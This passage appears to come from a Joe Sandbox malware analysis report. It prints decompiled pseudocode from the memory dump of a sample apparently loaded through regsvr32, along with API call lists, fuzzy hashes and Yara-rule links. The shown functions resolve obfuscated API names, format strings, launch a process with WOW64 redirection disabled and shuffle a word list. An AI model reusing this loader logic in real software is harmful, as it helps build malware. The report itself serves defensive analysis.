				return _v16;
			}

0x001e6efc
0x001e6f10
0x001e6f12
0x001e6f20
0x001e6f24
0x001e6f2c
0x001e6f34
0x001e6f34
0x001e6f36
0x001e6f42
0x001e6f51
0x001e6f56
0x001e6f59
0x001e6f5e
0x001e6f61
0x001e6f66
0x001e6f69
0x001e6f75
0x001e6f82
0x001e6f84
0x001e6f8a
0x001e6f8f
0x001e6f9a
0x001e6f9c
0x001e6f9f
0x001e6fa5
0x001e6fa7
0x001e6fb0
0x001e6fbb
0x001e6fbd
0x001e6fc0
0x001e6fc0
0x001e6fc2
0x001e6fc9
0x001e6fce
0x001e6fdb
0x001e6fdd
0x001e6fe2
0x001e6ff0
0x001e6ff2
0x001e6ff7
0x001e6ffc
0x001e6fff
0x001e7004
0x001e700f
0x001e7011
0x001e7014
0x001e7014
0x001e7016
0x001e7029
0x001e702d
0x001e7032
0x001e7036
0x001e7039
0x001e703e
0x001e7049
0x001e704b
0x001e704e
0x001e704e
0x001e7050
0x001e7057
0x001e705a
0x001e705f
0x001e7069
0x001e706b
0x001e7072
0x001e708a
0x001e708e
0x001e709a
0x001e709f
0x001e70a8
0x001e70b9
0x001e70bd
0x001e70c6
0x001e70cc
0x001e70d9
0x001e70e6
0x001e70ec
0x001e70f4
0x001e70fa
0x001e7100
0x001e7104
0x001e7108
0x001e710e
0x001e7112
0x001e7119
0x001e7120
0x001e7124
0x001e712f
0x001e7136
0x001e713a
0x001e7143
0x001e7143
0x001e7154
0x001e7154
0x001e7163
0x001e7169
0x001e7169
0x001e7173
0x001e7173
0x001e7184
0x001e7184
0x001e7192
0x001e7192
0x001e71a2

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 001E6F1A
GetTickCount.KERNEL32 ref: 001E6F2E
wsprintfA.USER32 ref: 001E6F7D
wsprintfA.USER32 ref: 001E6F9A
wsprintfA.USER32 ref: 001E6FBB
wsprintfA.USER32 ref: 001E6FD9
wsprintfA.USER32 ref: 001E6FEE
wsprintfA.USER32 ref: 001E700F
wsprintfA.USER32 ref: 001E7049
wsprintfA.USER32 ref: 001E7069
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001E7084
GetTickCount.KERNEL32 ref: 001E7094
RtlEnterCriticalSection.NTDLL(04E095F0), ref: 001E70A8
RtlLeaveCriticalSection.NTDLL(04E095F0), ref: 001E70C6

Part of subcall function 001E624D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,001E70D9,00000000,04E09630), ref: 001E6278
Part of subcall function 001E624D: lstrlen.KERNEL32(00000000,?,00000000,001E70D9,00000000,04E09630), ref: 001E6280
Part of subcall function 001E624D: strcpy.NTDLL ref: 001E6297
Part of subcall function 001E624D: lstrcat.KERNEL32(00000000,00000000), ref: 001E62A2
Part of subcall function 001E624D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,001E70D9,?,00000000,001E70D9,00000000,04E09630), ref: 001E62BF

StrTrimA.SHLWAPI(00000000,001E92AC,00000000,04E09630), ref: 001E70F4

Part of subcall function 001E21C1: lstrlen.KERNEL32(04E087FA,00000000,00000000,00000000,001E7100,00000000), ref: 001E21D1
Part of subcall function 001E21C1: lstrlen.KERNEL32(?), ref: 001E21D9
Part of subcall function 001E21C1: lstrcpy.KERNEL32(00000000,04E087FA), ref: 001E21ED
Part of subcall function 001E21C1: lstrcat.KERNEL32(00000000,?), ref: 001E21F8

lstrcpy.KERNEL32(00000000,?), ref: 001E7112
lstrcat.KERNEL32(00000000,00000000), ref: 001E7120
lstrcat.KERNEL32(00000000,00000000), ref: 001E7124
HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 001E7154
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001E7163
HeapFree.KERNEL32(00000000,00000000,00000000,04E09630), ref: 001E7173
HeapFree.KERNEL32(00000000,?), ref: 001E7184
HeapFree.KERNEL32(00000000,00000000), ref: 001E7192

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
String ID:
API String ID: 1837416118-0
Opcode ID: d7f86855b8e9736fba8d77d388e26a49eb605045aa398ed818f41898a5723a26
Instruction ID: c5226dc1629cc8ef11202088bef11efb15fe87ccc36fe58999c0160bb85cbc80
Opcode Fuzzy Hash: d7f86855b8e9736fba8d77d388e26a49eb605045aa398ed818f41898a5723a26
Instruction Fuzzy Hash: 0F71AE71504685AFD321DBA9ECC8E5F7BECFF88310B550415FA09DB621E736B8448B62

Uniqueness

Uniqueness Score: -1.00%

Function 001E5927, Relevance: 16.6, APIs: 11, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E001E5927(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				WCHAR* _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				WCHAR* _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				WCHAR* _t91;

				_t79 =  *0x1ea38c; // 0x4e09ba0
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E001E4E1B(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x1e91ac;
				}
				_t46 = E001E42F0(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E001E6837(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x1ea2d4; // 0x4c1d5a8
						_t16 = _t75 + 0x1ebaa8; // 0x530025
						wsprintfW(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E001E4E1B(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x1e91b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E001E6837(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E001E50CA(_v20);
						} else {
							_t66 =  *0x1ea2d4; // 0x4c1d5a8
							_t31 = _t66 + 0x1ebbc8; // 0x73006d
							wsprintfW(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E001E50CA(_v12);
				}
				return _v24;
			}

0x001e592f
0x001e5935
0x001e593c
0x001e5942
0x001e5946
0x001e594a
0x001e594d
0x001e5954
0x001e5957
0x001e5959
0x001e5959
0x001e5962
0x001e5969
0x001e596c
0x001e5972
0x001e597c
0x001e5985
0x001e598c
0x001e59a5
0x001e59ac
0x001e59af
0x001e59b8
0x001e59c1
0x001e59d2
0x001e59db
0x001e59df
0x001e59e3
0x001e59ea
0x001e59ed
0x001e59ef
0x001e59ef
0x001e59f9
0x001e5a02
0x001e5a09
0x001e5a21
0x001e5a25
0x001e5a62
0x001e5a27
0x001e5a2a
0x001e5a32
0x001e5a43
0x001e5a4f
0x001e5a57
0x001e5a5b
0x001e5a5b
0x001e5a25
0x001e5a6a
0x001e5a6f
0x001e5a76

APIs

GetTickCount.KERNEL32 ref: 001E593C
lstrlen.KERNEL32(?,80000002,00000005), ref: 001E597C
lstrlen.KERNEL32(00000000), ref: 001E5985
lstrlen.KERNEL32(00000000), ref: 001E598C
lstrlenW.KERNEL32(80000002), ref: 001E5999
wsprintfW.USER32 ref: 001E59D2
lstrlen.KERNEL32(?,00000004), ref: 001E59F9
lstrlen.KERNEL32(?), ref: 001E5A02
lstrlen.KERNEL32(?), ref: 001E5A09
lstrlenW.KERNEL32(?), ref: 001E5A10
wsprintfW.USER32 ref: 001E5A43

Part of subcall function 001E50CA: RtlFreeHeap.NTDLL(00000000,00000000,001E4239,00000000,00000001,?,00000000,?,?,?,001E6B8D,00000000,?,00000001), ref: 001E50D6

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: lstrlen$wsprintf$CountFreeHeapTick
String ID:
API String ID: 822878831-0
Opcode ID: 9954ebe2d701b813d55168de170501eb6a5bf0a882146a913ac9526f67676a45
Instruction ID: f1acb76f2d2bf007d5bf2882644f301dbfab608796bbef0e5519fa20ba902d84
Opcode Fuzzy Hash: 9954ebe2d701b813d55168de170501eb6a5bf0a882146a913ac9526f67676a45
Instruction Fuzzy Hash: 6A414972800659EFCF11AFA5CD48ADE7BB5FF48318F150060FE04A7222D7359A54EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001E51A8, Relevance: 13.6, APIs: 9, Instructions: 110
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E001E51A8(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t43;
				intOrPtr _t50;
				void* _t52;
				intOrPtr _t53;
				void* _t61;
				intOrPtr* _t66;
				intOrPtr* _t73;
				intOrPtr* _t76;

				_t1 = __eax + 0x14; // 0x74183966
				_t71 =  *_t1;
				_t39 = E001E4F5A(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				E001E77A4( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
				_t43 = _v12(_v12);
				_v8 = _t43;
				if(_t43 == 0 && ( *0x1ea2b8 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t50 =  *0x1ea2d4; // 0x4c1d5a8
					_t18 = _t50 + 0x1eb4a3; // 0x73797325
					_t52 = E001E6343(_t18);
					_v12 = _t52;
					if(_t52 == 0) {
						_v8 = 8;
					} else {
						_t53 =  *0x1ea2d4; // 0x4c1d5a8
						_t20 = _t53 + 0x1eb770; // 0x4e08d18
						_t21 = _t53 + 0x1eb0af; // 0x4e52454b
						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t66 == 0) {
							_v8 = 0x7f;
						} else {
							_t73 = __imp__;
							_v108 = 0x44;
							 *_t73(0);
							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
							 *_t73(1);
							if(_t61 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x1ea290, 0, _v12);
					}
				}
				_t76 = _v16;
				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
				E001E50CA(_t76);
				goto L12;
			}

0x001e51b1
0x001e51b1
0x001e51bf
0x001e51c8
0x001e51cb
0x001e52dd
0x001e52e4
0x001e52e4
0x001e51da
0x001e51e2
0x001e51e7
0x001e51ea
0x001e51ff
0x001e5205
0x001e5206
0x001e5209
0x001e520f
0x001e5212
0x001e5217
0x001e521f
0x001e5226
0x001e522d
0x001e5230
0x001e52c4
0x001e5236
0x001e5236
0x001e523b
0x001e5242
0x001e5256
0x001e525a
0x001e52ab
0x001e525c
0x001e525c
0x001e5263
0x001e526a
0x001e5282
0x001e5288
0x001e528c
0x001e52a6
0x001e528e
0x001e5297
0x001e529c
0x001e529c
0x001e528c
0x001e52bc
0x001e52bc
0x001e5230
0x001e52cb
0x001e52d4
0x001e52d8
0x00000000

APIs

Part of subcall function 001E4F5A: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,001E51C4,?,?,?,?,00000000,00000000), ref: 001E4F7F
Part of subcall function 001E4F5A: GetProcAddress.KERNEL32(00000000,7243775A), ref: 001E4FA1
Part of subcall function 001E4F5A: GetProcAddress.KERNEL32(00000000,614D775A), ref: 001E4FB7
Part of subcall function 001E4F5A: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 001E4FCD
Part of subcall function 001E4F5A: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 001E4FE3
Part of subcall function 001E4F5A: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 001E4FF9

memset.NTDLL ref: 001E5212

Part of subcall function 001E6343: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,001E522B,73797325), ref: 001E6354
Part of subcall function 001E6343: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 001E636E

GetModuleHandleA.KERNEL32(4E52454B,04E08D18,73797325), ref: 001E5249
GetProcAddress.KERNEL32(00000000), ref: 001E5250
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 001E526A
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 001E5288
CloseHandle.KERNEL32(00000000), ref: 001E5297
CloseHandle.KERNEL32(?), ref: 001E529C
GetLastError.KERNEL32 ref: 001E52A0
HeapFree.KERNEL32(00000000,?), ref: 001E52BC

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
String ID:
API String ID: 91923200-0
Opcode ID: 51bf1ad7e4d125b0f38a61ba7abcef1aa3b5579ee4e2686796a98da413f6b881
Instruction ID: 40a2d36fa403f86607c03991bd37f549b8098600a222060f4bd197ba834e5050
Opcode Fuzzy Hash: 51bf1ad7e4d125b0f38a61ba7abcef1aa3b5579ee4e2686796a98da413f6b881
Instruction Fuzzy Hash: 53316971900A5AEFCB119FE5CC88ADEBFB9FF08344F204051F205A7521D335AA81CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001E4F5A, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001E4F5A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E001E6837(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x1ea2d4; // 0x4c1d5a8
					_t1 = _t23 + 0x1eb11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x1ea2d4; // 0x4c1d5a8
					_t2 = _t26 + 0x1eb792; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E001E50CA(_t54);
					} else {
						_t30 =  *0x1ea2d4; // 0x4c1d5a8
						_t5 = _t30 + 0x1eb77f; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x1ea2d4; // 0x4c1d5a8
							_t7 = _t33 + 0x1eb74e; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x1ea2d4; // 0x4c1d5a8
								_t9 = _t36 + 0x1eb72e; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x1ea2d4; // 0x4c1d5a8
									_t11 = _t39 + 0x1eb7a2; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E001E4248(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x001e4f69
0x001e4f6d
0x001e502f
0x001e4f73
0x001e4f73
0x001e4f78
0x001e4f8b
0x001e4f8d
0x001e4f92
0x001e4f9a
0x001e4fa1
0x001e4fa5
0x001e4fa8
0x001e5027
0x001e5028
0x001e4faa
0x001e4faa
0x001e4faf
0x001e4fb7
0x001e4fbb
0x001e4fbe
0x00000000
0x001e4fc0
0x001e4fc0
0x001e4fc5
0x001e4fcd
0x001e4fd1
0x001e4fd4
0x00000000
0x001e4fd6
0x001e4fd6
0x001e4fdb
0x001e4fe3
0x001e4fe7
0x001e4fea
0x00000000
0x001e4fec
0x001e4fec
0x001e4ff1
0x001e4ff9
0x001e4ffd
0x001e5000
0x00000000
0x001e5002
0x001e5008
0x001e500d
0x001e5014
0x001e501b
0x001e501e
0x00000000
0x001e5020
0x001e5023
0x001e5023
0x001e501e
0x001e5000
0x001e4fea
0x001e4fd4
0x001e4fbe
0x001e4fa8
0x001e503d

APIs

Part of subcall function 001E6837: RtlAllocateHeap.NTDLL(00000000,00000000,001E4197), ref: 001E6843

GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,001E51C4,?,?,?,?,00000000,00000000), ref: 001E4F7F
GetProcAddress.KERNEL32(00000000,7243775A), ref: 001E4FA1
GetProcAddress.KERNEL32(00000000,614D775A), ref: 001E4FB7
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 001E4FCD
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 001E4FE3
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 001E4FF9

Part of subcall function 001E4248: memset.NTDLL ref: 001E42C7

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 807b3399e10152f1d6714f253b4a159b4dfc62c52509032f045b0de53c489220
Instruction ID: b2917ab8eefdccc55efe5b90a97869dfdf8e775cb361df50eef971a6552649cb
Opcode Fuzzy Hash: 807b3399e10152f1d6714f253b4a159b4dfc62c52509032f045b0de53c489220
Instruction Fuzzy Hash: C8214DB5A00A86AFD710DFAADC84E6F77ECEF08788B014055F509DB652D735E901CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001E2A23, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E001E2A23(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E001E6837(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E001E50CA(_v16);
								goto L37;
							}
							_t103 = E001E6837((_v8 + _v8 + 5) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x1ea2cc = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x001e2a2a
0x001e2a31
0x001e2a36
0x001e2a39
0x001e2a40
0x001e2a43
0x001e2a46
0x001e2a4d
0x001e2a50
0x001e2ba4
0x001e2ba6
0x001e2ba8
0x001e2bad
0x001e2bad
0x001e2a56
0x001e2a59
0x001e2a5c
0x001e2a5e
0x001e2a5e
0x001e2a62
0x00000000
0x00000000
0x001e2a66
0x001e2a92
0x001e2a97
0x001e2a99
0x001e2a99
0x001e2a9c
0x001e2a9f
0x001e2a9f
0x001e2aa1
0x00000000
0x001e2a6c
0x001e2a6e
0x001e2a8d
0x001e2a8d
0x001e2aa4
0x001e2aa4
0x001e2aa5
0x001e2aa5
0x001e2aa8
0x00000000
0x00000000
0x00000000
0x001e2aa8
0x001e2a72
0x001e2ab9
0x001e2abd
0x001e2b97
0x001e2b99
0x001e2b99
0x001e2b9a
0x001e2b9d
0x00000000
0x001e2b9d
0x001e2ad7
0x001e2adb
0x001e2b93
0x00000000
0x001e2b93
0x001e2ae1
0x001e2ae4
0x001e2ae8
0x001e2aee
0x001e2af1
0x001e2b89
0x001e2b89
0x00000000
0x001e2b8f
0x001e2afc
0x001e2b05
0x001e2b19
0x001e2b20
0x001e2b35
0x001e2b3b
0x001e2b43
0x00000000
0x00000000
0x00000000
0x00000000
0x001e2b45
0x001e2b45
0x001e2b45
0x001e2b4c
0x001e2b54
0x00000000
0x00000000
0x001e2b56
0x001e2b5f
0x00000000
0x00000000
0x00000000
0x001e2b61
0x001e2b63
0x001e2b66
0x001e2b66
0x001e2b69
0x001e2b6d
0x001e2b70
0x001e2b76
0x001e2b79
0x001e2b80
0x00000000
0x001e2afc
0x001e2a77
0x001e2a82
0x001e2a85
0x001e2a87
0x001e2a87
0x001e2a8a
0x001e2a8c
0x00000000
0x001e2a8c
0x001e2a66
0x001e2aac
0x001e2ab1
0x001e2ab3
0x001e2ab3
0x001e2ab6
0x001e2ab6
0x00000000

APIs

Part of subcall function 001E6837: RtlAllocateHeap.NTDLL(00000000,00000000,001E4197), ref: 001E6843

lstrcpy.KERNEL32(63699BC4,00000020), ref: 001E2B20
lstrcat.KERNEL32(63699BC4,00000020), ref: 001E2B35
lstrcmp.KERNEL32(00000000,63699BC4), ref: 001E2B4C
lstrlen.KERNEL32(63699BC4), ref: 001E2B70

Strings

, xrefs: 001E2AB9

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: 9b309b00a39d7712c44c627b5117e699eb2cfd5a440890197e755feec6d819ee
Instruction ID: f0a3b14868390511c6614c3f2a5b70d14f020268d156e15b0754088d9db19ca1
Opcode Fuzzy Hash: 9b309b00a39d7712c44c627b5117e699eb2cfd5a440890197e755feec6d819ee
Instruction Fuzzy Hash: 5551D771A00A48EFDF25CF9AC994BEDBBB9FF95310F158066E8159B211C7709A41CB80

Uniqueness

Uniqueness Score: -1.00%

Function 001E6C6D, Relevance: 6.2, APIs: 4, Instructions: 152
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E001E6C6D(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x1ea2d4; // 0x4c1d5a8
					_t5 = _t102 + 0x1eb038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x1e92b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
